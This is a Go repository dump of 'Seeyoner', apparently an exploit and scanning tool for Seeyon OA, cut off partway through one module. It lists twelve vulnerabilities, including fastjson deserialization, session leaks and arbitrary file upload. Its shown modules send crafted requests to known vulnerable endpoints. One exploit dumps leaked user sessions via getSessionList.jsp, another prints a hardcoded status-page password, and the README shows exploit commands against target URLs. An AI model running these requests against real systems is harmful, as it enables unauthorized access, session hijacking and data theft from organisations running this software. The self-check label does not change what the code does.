├── main.go ├── core ├── Seeyoner.go └── IFactory.go ├── .idea ├── .gitignore ├── vcs.xml ├── modules.xml └── seeyon-exploit-main.iml ├── go.mod ├── cmd ├── root.go ├── exploit.go ├── list.go └── scan.go ├── .github ├── workflows │ └── release.yml └── conf │ └── .goreleaser.yml ├── LICENSE ├── README.md ├── vulners ├── sy10.go ├── sy09.go ├── sy12.go ├── sy11.go ├── sy07.go ├── sy08.go ├── sy05.go ├── sy03.go ├── sy01.go ├── sy06.go ├── sy04.go └── sy02.go └── go.sum /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "seeyonerExp/cmd" 4 | 5 | func main() { 6 | cmd.Execute() 7 | } 8 | -------------------------------------------------------------------------------- /core/Seeyoner.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | type Seeyoner interface { 4 | Scan(url string) 5 | Exploit(url string) 6 | } 7 | -------------------------------------------------------------------------------- /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # 默认忽略的文件 2 | /shelf/ 3 | /workspace.xml 4 | # 基于编辑器的 HTTP 客户端请求 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/seeyon-exploit-main.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module seeyonerExp 2 | 3 | go 1.19 4 | 5 | require ( 6 | github.com/fatih/color v1.13.0 7 | github.com/spf13/cobra v1.5.0 8 | ) 9 | 10 | require ( 11 | github.com/inconshreveable/mousetrap v1.0.0 // indirect 12 | github.com/mattn/go-colorable v0.1.9 // indirect 13 | github.com/mattn/go-isatty v0.0.14 // indirect 14 | github.com/spf13/pflag v1.0.5 // indirect 15 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c // indirect 16 | ) 17 | -------------------------------------------------------------------------------- /cmd/root.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "os" 5 | 6 | "github.com/spf13/cobra" 7 | ) 8 | 9 | var ( 10 | url string 11 | vulnId int 12 | ) 13 | var rootCmd = &cobra.Command{ 14 | Use: "Seeyoner", 15 | Short: "Seeyoner", 16 | Long: `一个简单的致远OA安全测试工具，目的是为了协助漏洞自查、修复工作。`, 17 | } 18 | 19 | func Execute() { 20 | err := rootCmd.Execute() 21 | if err != nil { 22 | os.Exit(1) 23 | } 24 | } 25 | 26 | func init() { 27 | rootCmd.CompletionOptions.DisableDefaultCmd = true 28 | } 29 | -------------------------------------------------------------------------------- /cmd/exploit.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "github.com/spf13/cobra" 5 | "seeyonerExp/core" 6 | ) 7 | 8 | var exploitCmd = &cobra.Command{ 9 | Use: "exploit", 10 | Short: "漏洞利用", 11 | Long: `漏洞利用模块 12 | 【fastjson】targetUrl：url|jndiUrl|command`, 13 | Run: func(cmd *cobra.Command, args []string) { 14 | factory := new(core.IFactory) 15 | iExploit := factory.NewFactory(vulnId) 16 | iExploit.Exploit(url) 17 | }, 18 | } 19 | 20 | func init() { 21 | rootCmd.AddCommand(exploitCmd) 22 | exploitCmd.Flags().StringVarP(&url, "targetUrl", "u", "", "targetUrl") 23 | exploitCmd.Flags().IntVarP(&vulnId, "vulnId", "i", 0, "vulnId") 24 | exploitCmd.MarkFlagRequired("targetUrl") 25 | exploitCmd.MarkFlagRequired("vulnId") 26 | } 27 | -------------------------------------------------------------------------------- /.github/workflows/release.yml: -------------------------------------------------------------------------------- 1 | name: goreleaser 2 | 3 | on: 4 | push: 5 | tags: 6 | - '*' 7 | 8 | permissions: 9 | contents: write 10 | 11 | jobs: 12 | goreleaser: 13 | runs-on: ubuntu-latest 14 | timeout-minutes: 60 15 | steps: 16 | - 17 | name: Checkout 18 | uses: actions/checkout@v3 19 | with: 20 | fetch-depth: 0 21 | - 22 | name: Go 1.20 23 | uses: actions/setup-go@v4 24 | with: 25 | go-version: "1.19" 26 | - 27 | name: Run GoReleaser 28 | uses: goreleaser/goreleaser-action@v3 29 | with: 30 | distribution: goreleaser 31 | version: latest 32 | args: -f .github/conf/.goreleaser.yml 33 | workdir: . 34 | env: 35 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} -------------------------------------------------------------------------------- /cmd/list.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "fmt" 5 | "github.com/spf13/cobra" 6 | ) 7 | 8 | var ( 9 | VulnNames = []string{ 10 | //"log4j-RCE", 11 | "seeyon<8.0_fastjson反序列化", 12 | "thirdpartyController.do管理员session泄露", 13 | "webmail.do任意文件下载（CNVD-2020-62422）", 14 | "ajax.do未授权&任意文件上传", 15 | "getSessionList泄露Session", 16 | "htmlofficeservlet任意文件上传", 17 | "initDataAssess.jsp信息泄露", 18 | "DownExcelBeanServlet信息泄露", 19 | "createMysql.jsp数据库信息泄露", 20 | "test.jsp路径", 21 | "setextno.jsp路径", 22 | "status.jsp路径（状态监控页面）"} 23 | ) 24 | var listCmd = &cobra.Command{ 25 | Use: "list", 26 | Short: "列出所有漏洞信息", 27 | Long: `完整的漏洞列表及对应ID.`, 28 | Run: func(cmd *cobra.Command, args []string) { 29 | for i, v := range VulnNames { 30 | fmt.Printf("【%v】%v\n", i+1, v) 31 | } 32 | }, 33 | } 34 | 35 | func init() { 36 | rootCmd.AddCommand(listCmd) 37 | } 38 | -------------------------------------------------------------------------------- /core/IFactory.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "os" 6 | "seeyonerExp/vulners" 7 | ) 8 | 9 | type IFactory struct { 10 | } 11 | 12 | func (i *IFactory) NewFactory(name int) Seeyoner { 13 | switch name { 14 | case 0: 15 | return nil 16 | case 1: 17 | return &vulners.Sy01{} 18 | case 2: 19 | return &vulners.Sy02{} 20 | case 3: 21 | return &vulners.Sy03{} 22 | case 4: 23 | return &vulners.Sy04{} 24 | case 5: 25 | return &vulners.Sy05{} 26 | case 6: 27 | return &vulners.Sy06{} 28 | case 7: 29 | return &vulners.Sy07{} 30 | case 8: 31 | return &vulners.Sy08{} 32 | case 9: 33 | return &vulners.Sy09{} 34 | case 10: 35 | return &vulners.Sy10{} 36 | case 11: 37 | return &vulners.Sy11{} 38 | case 12: 39 | return &vulners.Sy12{} 40 | default: 41 | color.Red("[x]不存在的漏洞编号！可使用list命令查看") 42 | os.Exit(1) 43 | return nil 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright © 2022 x51 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in 13 | all copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 21 | THE SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # seeyoner 2 | 致远OA漏洞利用工具 3 | 4 | ## Usage 5 | ``` 6 | PS C:\> seeyonerExp.exe -h 7 | 一个简单的致远OA安全测试工具，目的是为了协助漏洞自查、修复工作。 8 | 9 | Usage: 10 | Seeyoner [command] 11 | 12 | Available Commands: 13 | exploit 漏洞利用 14 | help Help about any command 15 | list 列出所有漏洞信息 16 | scan 漏洞检测 17 | 18 | Flags: 19 | -h, --help help for Seeyoner 20 | 21 | Use "Seeyoner [command] --help" for more information about a command. 22 | ``` 23 | ### scan 24 | 全漏洞探测： 25 | ``` 26 | seeyonerExp.exe -u http://xxx.com -i 0 27 | ``` 28 | 29 | 指定漏洞探测： 30 | `-vn`指定漏洞编号，可通过`-show`参数查看： 31 | ``` 32 | D:\>seeyonerExp.exe list 33 | 34 | 漏洞列表： 35 | 1、seeyon<8.0_fastjson反序列化 36 | 2、thirdpartyController.do管理员session泄露 37 | 3、webmail.do任意文件下载（CNVD-2020-62422） 38 | 4、ajax.do未授权&任意文件上传 39 | 5、getSessionList泄露Session 40 | 6、htmlofficeservlet任意文件上传 41 | 7、initDataAssess.jsp信息泄露 42 | 8、DownExcelBeanServlet信息泄露 43 | 9、createMysql.jsp数据库信息泄露 44 | 10、test.jsp路径 45 | 11、setextno.jsp路径 46 | 12、status.jsp路径（状态监控页面） 47 | ``` 48 | 探测seeyon<8.0_fastjson反序列化漏洞： 49 | ``` 50 | seeyonerExp.exe scan -u http://xxx.com -i 1 51 | ``` 52 | 53 | ### run 54 | 55 | 以Session泄露+zip文件上传解压为例，指定编号为`2`： 56 | 57 | ``` 58 | seeyonerExp.exe exploit -u http://xxxx.com -i 2 59 | ``` 60 | 61 | -------------------------------------------------------------------------------- /cmd/scan.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "github.com/spf13/cobra" 5 | "os" 6 | "seeyonerExp/core" 7 | "strconv" 8 | "sync" 9 | ) 10 | 11 | var wg sync.WaitGroup // 并发有序的组 12 | var mutex = &sync.Mutex{} 13 | 14 | var scanCmd = &cobra.Command{ 15 | Use: "scan", 16 | Short: "漏洞检测", 17 | Long: `漏洞检测功能 18 | `, 19 | Run: func(cmd *cobra.Command, args []string) { 20 | factory := new(core.IFactory) 21 | 22 | if vulnId == 0 { 23 | limiter := make(chan struct{}, 1) // 通过管道控制并发数 24 | arr := []string{"1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12"} 25 | for _, pro := range arr { //并发应该处于一个循环之中 26 | wg.Add(1) 27 | limiter <- struct{}{} 28 | go func(pro string) { 29 | num, _ := strconv.Atoi(pro) 30 | iScan := factory.NewFactory(num) 31 | iScan.Scan(url) 32 | wg.Done() 33 | <-limiter 34 | }(pro) 35 | } 36 | wg.Wait() 37 | os.Exit(0) 38 | } 39 | iScan := factory.NewFactory(vulnId) 40 | iScan.Scan(url) 41 | }, 42 | } 43 | 44 | func init() { 45 | rootCmd.AddCommand(scanCmd) 46 | 47 | scanCmd.Flags().StringVarP(&url, "targetUrl", "u", "", "targetUrl") 48 | scanCmd.Flags().IntVarP(&vulnId, "vulnId", "i", 0, "vulnId") 49 | scanCmd.MarkFlagRequired("targetUrl") 50 | scanCmd.MarkFlagRequired("vulnId") 51 | } 52 | -------------------------------------------------------------------------------- /vulners/sy10.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy10 struct { 9 | } 10 | 11 | func (s *Sy10) Scan(targetUrl string) { 12 | scancorePayload := "/yyoa/common/js/menu/test.jsp" 13 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常！") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常！") 21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在test.jsp路径") 25 | } else { 26 | color.White("[-]不存在test.jsp路径") 27 | } 28 | } 29 | func (s *Sy10) Exploit(targetUrl string) { 30 | scancorePayload := "/yyoa/common/js/menu/test.jsp" 31 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常！") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常！") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在test.jsp路径") 43 | } else { 44 | color.White("[-]不存在test.jsp路径") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /vulners/sy09.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy09 struct { 9 | } 10 | 11 | func (s *Sy09) Scan(targetUrl string) { 12 | scancorePayload := "/yyoa/createMysql.jsp" 13 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常！") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常！") 21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在createMysql.jsp数据库信息泄露") 25 | } else { 26 | color.White("[-]不存在createMysql.jsp数据库信息泄露") 27 | } 28 | } 29 | func (s *Sy09) Exploit(targetUrl string) { 30 | scancorePayload := "/yyoa/createMysql.jsp" 31 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常！") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常！") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在createMysql.jsp数据库信息泄露") 43 | } else { 44 | color.White("[-]不存在createMysql.jsp数据库信息泄露") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /vulners/sy12.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy12 struct { 9 | } 10 | 11 | func (s *Sy12) Scan(targetUrl string) { 12 | scancorePayload := "/seeyon/management/status.jsp" 13 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常！") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常！") 21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在status.jsp路径（密码：WLCCYBD@SEEYON）") 25 | } else { 26 | color.White("[-]不存在status.jsp路径") 27 | } 28 | } 29 | func (s *Sy12) Exploit(targetUrl string) { 30 | scancorePayload := "/seeyon/management/status.jsp" 31 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常！") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常！") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在status.jsp路径（密码：WLCCYBD@SEEYON）") 43 | } else { 44 | color.White("[-]不存在status.jsp路径") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /vulners/sy11.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy11 struct { 9 | } 10 | 11 | func (s *Sy11) Scan(targetUrl string) { 12 | scancorePayload := "/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp" 13 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常！") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常！") 21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在setextno.jsp路径") 25 | } else { 26 | color.White("[-]不存在setextno.jsp路径") 27 | } 28 | } 29 | func (s *Sy11) Exploit(targetUrl string) { 30 | scancorePayload := "/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp" 31 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常！") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常！") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在setextno.jsp路径") 43 | } else { 44 | color.White("[-]不存在setextno.jsp路径") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /vulners/sy07.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy07 struct { 9 | } 10 | 11 | func (s *Sy07) Scan(targetUrl string) { 12 | scancorePayload := "/yyoa/assess/js/initDataAssess.jsp" 13 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常！") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常！") 21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在initDataAssess.jsp信息泄露") 25 | } else { 26 | color.White("[-]不存在initDataAssess.jsp信息泄露") 27 | } 28 | } 29 | func (s *Sy07) Exploit(targetUrl string) { 30 | scancorePayload := "/yyoa/assess/js/initDataAssess.jsp" 31 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常！") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常！") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在initDataAssess.jsp信息泄露") 43 | } else { 44 | color.White("[-]不存在initDataAssess.jsp信息泄露") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /vulners/sy08.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "net/http" 6 | ) 7 | 8 | type Sy08 struct { 9 | } 10 | 11 | func (s *Sy08) Scan(targetUrl string) { 12 | scancorePayload := "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0" 13 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 14 | if err != nil { 15 | color.Red("[x]请求异常！") 16 | } 17 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 18 | resp, err := (&http.Client{}).Do(req) 19 | if err != nil { 20 | color.Red("[x]漏洞探测异常！") 21 | } 22 | defer resp.Body.Close() 23 | if resp.StatusCode == 200 { 24 | color.Green("[+]存在DownExcelBeanServlet信息泄露") 25 | } else { 26 | color.White("[-]不存在DownExcelBeanServlet信息泄露") 27 | } 28 | } 29 | func (s *Sy08) Exploit(targetUrl string) { 30 | scancorePayload := "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0" 31 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 32 | if err != nil { 33 | color.Red("[x]漏洞探测异常！") 34 | } 35 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 36 | resp, err := (&http.Client{}).Do(req) 37 | if err != nil { 38 | color.Red("[x]漏洞探测异常！") 39 | } 40 | defer resp.Body.Close() 41 | if resp.StatusCode == 200 { 42 | color.Green("[+]存在DownExcelBeanServlet信息泄露") 43 | } else { 44 | color.White("[-]不存在DownExcelBeanServlet信息泄露") 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /.github/conf/.goreleaser.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - sudo apt -y install libprotobuf-dev protobuf-compiler protoc-gen-go 4 | - go mod tidy 5 | - go generate ./... 6 | builds: 7 | - id: "with-upx" 8 | env: 9 | - CGO_ENABLED=0 10 | goos: 11 | - linux 12 | - windows 13 | - darwin 14 | goarch: 15 | - amd64 16 | - arm64 17 | - arm 18 | - "386" 19 | goarm: 20 | - "6" 21 | - "7" 22 | flags: 23 | - -trimpath 24 | ldflags: 25 | - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser 26 | ignore: 27 | - goos: windows 28 | goarch: arm64 29 | - goos: windows 30 | goarch: arm 31 | - goos: linux 32 | goarch: mips64 33 | hooks: 34 | post: upx --best -f -q "{{ .Path }}" 35 | 36 | # UnknownExecutableFormatException 37 | # CantPackException: can't pack new-exe 38 | - id: "without-upx" 39 | env: 40 | - CGO_ENABLED=0 41 | goos: 42 | - linux 43 | - windows 44 | - darwin 45 | goarch: 46 | - mips64 47 | - arm 48 | goarm: 49 | - "6" 50 | - "7" 51 | flags: 52 | - -trimpath 53 | ldflags: 54 | - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser 55 | ignore: 56 | - goos: linux 57 | goarch: arm 58 | 59 | 60 | archives: 61 | - format: zip 62 | name_template: '{{ .ProjectName }}_{{ .Os }}_{{ .Arch }}{{ if .Arm }}v{{ .Arm }}{{ end }}' 63 | checksum: 64 | name_template: 'checksums.txt' 65 | snapshot: 66 | name_template: "{{ incpatch .Version }}-next" 67 | changelog: 68 | sort: asc 69 | filters: 70 | exclude: 71 | - '^docs:' 72 | - '^test:' -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/cpuguy83/go-md2man/v2 v2.0.2/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= 2 | github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w= 3 | github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk= 4 | github.com/inconshreveable/mousetrap v1.0.0 h1:Z8tu5sraLXCXIcARxBp/8cbvlwVa7Z1NHg9XEKhtSvM= 5 | github.com/inconshreveable/mousetrap v1.0.0/go.mod h1:PxqpIevigyE2G7u3NXJIT2ANytuPF1OarO4DADm73n8= 6 | github.com/mattn/go-colorable v0.1.9 h1:sqDoxXbdeALODt0DAeJCVp38ps9ZogZEAXjus69YV3U= 7 | github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= 8 | github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= 9 | github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y= 10 | github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94= 11 | github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= 12 | github.com/spf13/cobra v1.5.0 h1:X+jTBEBqF0bHN+9cSMgmfuvv2VHJ9ezmFNf9Y/XstYU= 13 | github.com/spf13/cobra v1.5.0/go.mod h1:dWXEIy2H428czQCjInthrTRUg7yKbok+2Qi/yBIJoUM= 14 | github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA= 15 | github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg= 16 | golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 17 | golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 18 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c h1:F1jZWGFhYfh0Ci55sIpILtKKK8p3i2/krTr0H1rg74I= 19 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 20 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 21 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= 22 | -------------------------------------------------------------------------------- /vulners/sy05.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "io/ioutil" 6 | "net/http" 7 | ) 8 | 9 | type Sy05 struct { 10 | } 11 | 12 | func (s *Sy05) Scan(targetUrl string) { 13 | vulnerable, err := sy05scancore(targetUrl) 14 | if err != nil { 15 | color.Red("[x]请求异常！") 16 | return 17 | } 18 | if vulnerable { 19 | color.Green("[+]存在getSessionList泄露Session") 20 | } else { 21 | color.White("[-]不存在getSessionList泄露Session") 22 | } 23 | } 24 | 25 | func (*Sy05) Exploit(targetUrl string) { 26 | runResult, err := sy05runcore(targetUrl) 27 | if err != nil { 28 | color.Red("[x]漏洞利用异常！") 29 | return 30 | } 31 | if runResult != "" { 32 | color.White(runResult) 33 | } else { 34 | color.White("[!]无返回结果.") 35 | } 36 | } 37 | 38 | func sy05scancore(targetUrl string) (bool, error) { 39 | scancorePayload := "/yyoa/ext/https/getSessionList.jsp?cmd=getAll" 40 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 41 | if err != nil { 42 | return false, err 43 | } 44 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 45 | resp, err := (&http.Client{}).Do(req) 46 | if err != nil { 47 | return false, err 48 | } 49 | defer resp.Body.Close() 50 | if resp.StatusCode == 200 { 51 | return true, nil 52 | } else { 53 | return false, nil 54 | } 55 | } 56 | func sy05runcore(targetUrl string) (string, error) { 57 | runcorePayload := "/yyoa/ext/https/getSessionList.jsp?cmd=getAll" 58 | req, err := http.NewRequest("GET", targetUrl+runcorePayload, nil) 59 | if err != nil { 60 | return "", err 61 | } 62 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 63 | resp, err := (&http.Client{}).Do(req) 64 | if err != nil { 65 | return "", err 66 | } 67 | defer resp.Body.Close() 68 | respContent, err := ioutil.ReadAll(resp.Body) 69 | if err != nil { 70 | return "", err 71 | } 72 | return string(respContent), nil 73 | } 74 | -------------------------------------------------------------------------------- /vulners/sy03.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "io/ioutil" 6 | "net/http" 7 | ) 8 | 9 | type Sy03 struct { 10 | } 11 | 12 | func (s *Sy03) Scan(targetUrl string) { 13 | vulnerable, err := sy03scancore(targetUrl) 14 | if 